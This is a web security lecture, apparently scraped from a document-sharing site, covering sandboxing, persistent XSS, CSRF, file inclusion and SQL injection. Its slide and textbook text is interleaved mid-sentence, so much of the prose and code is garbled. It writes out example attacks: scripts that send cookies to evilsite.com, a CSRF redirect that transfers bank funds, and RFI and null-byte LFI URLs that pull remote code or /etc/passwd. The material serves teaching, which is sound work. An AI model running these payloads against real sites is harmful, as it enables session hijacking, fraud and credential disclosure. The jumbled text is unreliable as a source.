Professional Documents
Culture Documents
Computer Security
Lecture – 20: Web Security - 2
Sandboxing
The Sandbox
Before continuing the discussion of such attacks on clients, it is helpful to
introduce the idea of the sandbox. A sandbox refers to the restricted privi-
leges of an application or script that is running inside another application.
For example, a sandbox may allow access only to certain files and devices.
These limitations are collectively known as a sandbox. (See Figure 15.)
read
only to certain files and devices Actions allowed
in the sandbox:
write
execute
all user files
• These are attacks where improper input validation on a web site allows
In this case, the guestbook is known as an attack vector—it’s the means
by which a malicious user can inject code. The specifics of that injected
malicious users code
to inject code into the web site
are known as the payload. In this case, the payload was a relatively
harmless (if annoying) pop-up box, but it is possible to construct much
• which later is executed in a visitor’s browser
more dangerous payloads. (See Figure 16.)
Attacker
Victim
Persistent XSS
• In a persistent XSS attack, the code that the attacker injects into the web
site remains on the site for a period of time and is visible to other users
• A classic example of persistent XSS is exploiting a web site’s guestbook or
message board
• Consider a web site, such as a news web site or social networking site,
that incorporates a guestbook allowing visitors to enter comments and
post them for other visitors to see
• If the user input to be stored in the guestbook is not properly sanitised
to strip certain characters, it may be possible for an attacker to inject
malicious code that is executed when other users visit the site
message board. </html>
Consider a web site, such as a news web site or social networking site,
thatAttacker
incorporates a guestbook allowing visitors to enter
Code Fragment The guestbook
7: comments and page incorporating comments from visi-
post them for other visitors to see. If thetors. user input to be stored in the
Persistent XSS
guestbook is not properly sanitized to strip certain characters, it may be
Take, for instance, the snippet of Javascript code in Code Fragment 8.
possible for an attacker to inject malicious
Malicious code that is executed when other
XSS Vulnerable
users visit the site.Script
First,
Codethe user might be presented with the form from
Website
Code Fragment 6. <script> Web Security
alert("XSS injection!");
Victim </script>
<html> <html>
<title>Sign My Guestbook!</title> Code Fragment 8: Javascript code that might be used
<title to test
>My XSS injection.
Guestbook </title>
<body>
<body>
Sign my guestbook! This Javascript code simply creates a pop-up
Figure 16: In an XSS attack, the attacker uses the web site as a vector to
Web Securitymethod="POST"> Yourmessage
commentsboxare
withgreatly
the textappreciated!<br />
< form action="sign.php"
execute malicious code in a victim’s browser. XSS injection! when the code is executed.Here If the sign.php script on the
<input type="text" name="name"> server simply copies whatever the user types in the is what everyone said:<br />
parameter
Javascript hassteal.php
for<the abilitypage,
thetype="text"
input which
to redirect presumably
visitors
name="message" records
to arbitrary the cookies.
pages,
size="40" so>this is Joe: Hi! <POST
br /> form into the
The
oneattacker could contents aof the guestbook, the result wouldJohn:be the codehowshown
are in Code
possible< inputthen
avenue foruse the Malicious
attack.
type="submit" cookies tousers
impersonate the
> victim
could simply
value="Submit" inject at the
short Hello, you? <br />
target
scriptsite
thatinredirects
a sessionallhijacking
viewers attack.
to a newNevertheless, thisFragment
page that attempts technique 9.
is
to download aIf anyone visited the page containing the attacker’s comment,
Jane: How does the guestbook work? <br />
</form>
bit crude,orbecause
viruses a user would
other malware most
to their likely notice
systems. Combinedif their browser
with was
Javascript’s
this excerpt would be executed as code and the user
</body > </body > would get a pop-up
redirected
ability to to an unexpected
access and manipulatepage. There
cookies,arehowever,
several techniques
this attackan canattacker
become
< /html > the execution message box. </html>
could
even use
more to dangerous.
hide of this an
For example, code. Two of
attacker the most
could injectpopular
the scriptareof
embedding an image
Code Fragment request
10 into to the malicious URL and using an invisible
a guestbook.
CodeHTML
iframe—an Fragment
element A page
6: which that
makes allowstousers
it possible embedtoa web
<html
post
> page
comments to a guest- Code Fragment 7: The guestbook page incorporating comment
inside book.
another.
<script > <title>My Guestbook</title> tors.
document.location
Code Fragment 11 = shows
"http://www.evilsite.com/
a use of Javascript to create an < bodywhich
image, >
On entering a comment,
steal.php?cookie="+document.cookie; this page will submit
then sets the source of that image to the attacker’s site, again Your the
passing user’s input
the
comments as POST
are greatly appreciated!<br Take,
/> for instance, the snippet of Javascript code in Code Fra
</script>
cookie variables to the When
as a GET variable. page thesign.php. This page
page is rendered, the presumably
victim’s
Here uses everyone
browser
is what server-side code
said: <br />
makes (which
a requestwill
to be
this discussed
URL for the later
image, in this
passing chapter),
the cookie to
to insert
the
Evilguy:
Code Fragment 10: A Javascript function that could be used to steal a user’s the
user
< user’s
script > input
alert("XSS into
Injection!"); </script> <br />
without displaying any results (since no image is
the guestbook page, which might look something
cookie. returned). Joe: Hi! br />shown in Code
like<that < script >
Fragment 7. Javascript’s ability to access the DOM John: Hello, how are you? <br /> alert("XSS injection!");
<script >
This code uses to redirect a
img = new Image(); Jane: How does the guestbook work? <<br/script
/> >
visitor to the attacker’s site, www.evilsite.com, and concatenates the user’s
img.src = "http://www.evilsite.com/steal.php?cookie=" </body>
cookies (accessed by the DOM object document.cookie) to the URL as a GET
+ document.cookie; </html> Code Fragment 8: Javascript code that might be used to test XSS
</script>
Code Fragment 9: The resulting guestbook page, with the Javascript above
Code Fragment 11: Using an image for XSS. This Javascript code simply creates a pop-up message box w
injected via XSS.
Web Security
and displayed in a web page at a later time, at which point the scrip
Non-persistent XSS execute in the user’s browser.
• Another common type of web site site’s trust of a specific user. In a CSRF attack, a malicious web site cau
a user to unknowingly execute commands on a third-party site that tru
scripting
Evil
• While XSS exploits a user’s trust of a specific Website
Malicious
Request
<script>
CSRF Figure 17: In a CSRF attack, a malicious web site executes a request to a
vulnerable site on behalf of a trusted user of that site.
• Suppose an innocent user handles his banking online
Suppose an innocent user handles his banking online at
at
www.naivebank.com
www.naivebank.com. This user may stumble upon a site, www.evilsite.com,
• This user
thatmay stumble
contains upon
the lines a site, www.evilsite.com,
of malicious that
Javascript code in Code contains
Fragment 14. the
lines of malicious JavaScript code
<script>
document.location="http://www.naivebank.com/
transferFunds.php?amount=10000&fromID=1234&toID=5678";
</script>
Web Server
Client
Scripting Module
2. Server passes user
input and scripted
HTML to Scripting
Module
3. Scripting Module
4. Server returns to user performs script, possibly
dynamic content in a accessing other servers and/or
customized HTML file d t b
databases, and
d returns
t HTML
This variable,
<htmlnumber,
> would most likely be provided through a stan-
dard HTML form, <bodyas> in our previous example. The “<?php” and “?>”
tags denote the <start and number
p>Your end of the 5.</p>The echo command outputs
wasscript.
<p>The
results to the screen. The square of your
array that storesnumber is 25.
all of the </p> GET variable
provided
is referred to <as/body
“$ GET”—in
> this case, we are accessing the one named
</html
number. Finally, > that variables $x and $y are used without a previous
note
Server-side scripting inclusion attack
• In a server-side script inclusion attack, a web security vulnerability at a
web server is exploited to allow an attacker to inject arbitrary scripting
code into the server
• which then executes this code to perform an action desired by the attacker
• Two types:
• RFI (Remote-File Inclusion):
• Enables an attacker to execute a remote script in another server
• LFI (Local-File Inclusion):
• Enables an attacker to execute a local malicious script in the same server
argument
filesinto thethan
other current
thePHP argument
onepage,
that into the
executing
is currentlyanycurrent PHP
run.page,
PHP script
being For executing
example,any
contained PHP
one script contained
may
in it. Consider index.php page in it. Consider index.php page
theFragment shown“.”
in Code Fragment 17, where “.”
want to theinclude a common shown
headerin Code
and footer to 17,
all where
pages
denotes concatenation of two strings.
of a website. In
denotes concatenation of two strings.
addition, it may be useful to load different files based on user input. PHP
RFI <?php
<?phpprovides the include function, which incorporates the file specified by the
include("header.html");
argument into the current include($
include("header.html"); PHP page, executing any PHP script contained
GET[’page’].".php");
include($ GET[’page’].".php");
in it. Consider the index.php page shown in Code Fragment 17, where “.”
include("footer.html");
include("footer.html");
?> denotes concatenation of ?two
>
strings.
Code Fragment 17: A PHP page that uses file inclusion to incorporate an
<?php 17: A PHP page that
Code Fragment HTMLuses file inclusion
header, an HTMLto incorporate
footer, an
and a user-specified page.
User submits: Server executes:
include("header.html");
HTML header, an HTML footer, and a user-specified page.
include($ GET[’page’].".php"); Navigating to victim.com/index.php?page=news in this case would re-
vicitim.com/index.php?page=news.php
Navigating sult in the web serverinloading
to victim.com/index.php?page=news
include("footer.html"); andwould
this case re- page news.php using the PHP
executing
> web server loading and processor,
sult in?the executingwhich presumablyusing
page news.php generates the news page and displays it for
the PHP
the user.
processor, which presumably generates theHowever,
news pagean attacker might it
and displays navigate
for to a page specified by the
the user. However, an attacker following
might URL:to a page specified by the
navigate
Code Fragment
Attacker 17: A PHP
submits page that uses file inclusion to incorporate an
following
HTML URL:
header, an HTML footer, and a user-specified page. Server executes
http://victim.com/index.php?page=http://evilsite.com/evilcode
This would result in the web server at victim.com
http://victim.com/index.php?page=http://evilsite.com/evilcode executing the code at
http://evilsite.com/evilcode.php
evilsite.com/evilcode.php locally. Such an attack is known as a remote-file
This would Navigating
result in the victim.com/index.php?page=news
to web server at victim.com executing theincode thisatcase would re-
inclusion (RFI) attack. An example of code an attacker might execute in
evilsite.com/evilcode.php
sult in the web server locally. Such
loading
such anan
andattack is is
executing
attack known
a web page
shell, anews.php
aswhich
remote-file
is a remoteusing the PHP
command station that allows
inclusion
• An (RFI)
processor, attack.
examplewhich An example
of codepresumably
an attacker of code
might an
generates
an attacker attacker
toexecute theinto
navigate might
such
news anexecute
page
the web attack in
isdisplays
andand
server a possibly
web shellit foredit, upload,
view,
such an •attack is a web
whichHowever, shell,
is a remoteanwhich is
command a remote
or deletestation command
files onthat station
allows that
anthis allows
the user. attacker might web sites that
navigate to aattacker
page to navigate
web server bytothe
is hosting.
specified the web server and possibly view,
an attacker to navigate to the web server and
Fortunately, possibly view, edit, upload,
remote-file inclusion attacks are becoming less common,
edit, upload,
following URL: or delete files on web sites
or delete files on web sites that thisbecauseweb server
most is PHPhosting.
• Fortunately, remote-file inclusion attacks areinstallations
becoming less now default to disallowing the server to
common
http://victim.com/index.php?page=http://evilsite.com/evilcode
Fortunately, remote-file inclusion attacks
execute codeare becoming
hosted less common,
on a separate server. Nevertheless, this does not pre-
• because most PHP installations disallows the server to execute code hosted on a separate server by default
becauseThismost PHP installations
would result in the now web default
server to disallowing
at victim.com the executing
server to the code at
execute code hosted on a separate server. Nevertheless, this does not pre-
a malicious purpose). The difference in an LFI attack, however, is that the
As in ancode
executed RFIisattack, a local-file
not contained server, (LFI)
inclusion
on a remote but on attack
the victimcauses
servera server to
http://victim.com/index.php?page=admin/secretpage
execute
itself. Thisinjected
locality code it would
may allow not have
an attacker accessotherwise performedby
to private information (usually for
ameans
malicious purpose).
of bypassing The difference
authentication in an For
mechanisms. LFIexample,
The URL above might cause the index page to execute the previously
attack, an however,
attacker is that the
executed
itself. LFI
might navigate to
protected code
This
isthe
locality
notfollowing
secretpage.php. contained
may
URL:on a LFI
Sometimes,
allowsystem,
remote
an attacker
accesshttp://victim.com/index.php?page=admin/secretpage
files on the web server’s outside
server,
attacks
access
but on
can allow
of thetoroot
anthe
private
victim
attacker
web information
to server
directory. by
means of bypassing
For example, many Linux authentication
systems keepmechanisms. For example,
a file at /etc/passwd that stores an attacker
local
mightThenavigate
authentication
URL above to might
the following
information. cause the URL:
In the example
index page above, note that
to execute attempting to
the previously
access
protectedthissecretpage.php. Attacker
file by navigating tosubmits
the following
Sometimes, LFI attacksURLcanwill
allownotanwork:
attacker to Server executes:
accesshttp://victim.com/index.php?page=admin/secretpage
files on the web server’s system, outside of the root web directory. vicitim.com/index.php?page=admin/secretpage.php
http://victim.com/index.php?page=/etc/passwd
For example, many Linux systems keep a file at /etc/passwd that stores local Authentication bypassed
authentication information. In the example above, note that attempting to
Thethis URL by above might tocause the index page towork:
execute the previously
access
Becausefile theAttacker
navigating
code submits
concatenatesthe following
.php to any URL willbefore
input not trying to include
protected secretpage.php. Sometimes, LFI attacks can allow doesServer
an executes
attacker to
the code, the web server will try to execute /etc/passwd.php, which not
access files on thethis,web server’s system,
exist. http://victim.com/index.php?page=/etc/passwd
To bypass an attacker could include outside
what isof the root
known as webbyte,
directory.
http://victim.com/index.php?page=/etc/passwd.php
a null
For example,
which many Linux
can be encoded as %00 systems
in a URL. keep
Theanull at /etc/passwd
filebyte denotes the end thatofstores
the local
Because the codetheconcatenates .php to any remove
input before
the trying to include Not found!
authentication
string, allowing information.
attacker toIn the example
effectively above, noteconcatenation.
.php that attempting to
the code, the web server will try to execute /etc/passwd.php, which does not
In this case,
access this theAttacker
file following
by URL could
submits
navigating to the be accessed:URL will not work:
following
exist. To bypass this, an attacker could include what is known as a null byte, Server executes
which can be encoded as %00 in a URL. The null byte denotes the end of the
http://victim.com/index.php?page=/etc/passwd%00
allowing the attacker to effectively remove the .php concatenation. http://victim.com/index.php?page=/etc/passwd
string,http://victim.com/index.php?page=/etc/passwd
In this case, the following URL could be accessed: Bingo!!
This
%00 form
->theof attack
null ->may
the seem
byteconcatenates end ofrelatively
string, benign
ignore when limited
anything after it!totoin-include
Because
formation code .php to any input before
disclosure, but the advent of user-provided content suggests trying
http://victim.com/index.php?page=/etc/passwd%00
the code, the
another method webofserver
attack will
using trythis
to execute /etc/passwd.php,
technique. For example, awhichweb site does not
exist.isTo
thatThis bypass
vulnerable
form this, an attacker
to local-file
of attack may could
inclusion
seem include
might
relatively alsowhat
benign have ais
when known
means
limited as
tofor a null byte,
in-users
which
to upload
formationcandisclosure,
be encoded
images. If but
the %00
asthe
image in a URL.
uploading
advent The
form null byte
does
of user-provided notdenotes
carefully
content the
suggests end of the
check
what
another
string, is allowing
being
method uploaded,
oftheattack this
using
attacker mayto provide
this an attacker
technique.
effectively anthe
avenue
For example,
remove a web
.php toconcatenation.
upload
site
that
In is vulnerable
malicious
this case,code tothe
local-file
thetofollowing inclusion
serverURL(that could
wouldmight
not
be also have a means
ordinarily
accessed: for users and
be executed),
Since databases often contain confidential information, they are fre-
quently the target of attacks. Attackers could, for example, be interested
in accessing private information or modifying information in a database for
financial gain. Because of the sensitivity of information stored in a database,
• An SQL injection attack involves Figure 20: A model for user interactions with a web server that uses a
database. All database queries are performed via the web server, and direct
(a) (b)
Figure 21: How replication helps against DDOS web attacks: (a) A single
web server for a web site, which is quite vulnerable to DDOS web attacks.
(b) Multiple web servers for the same web site, which are more resilient.
https://pics.me.me/peace-love-and-bazinga-memegen-it-peace-love-52785009.png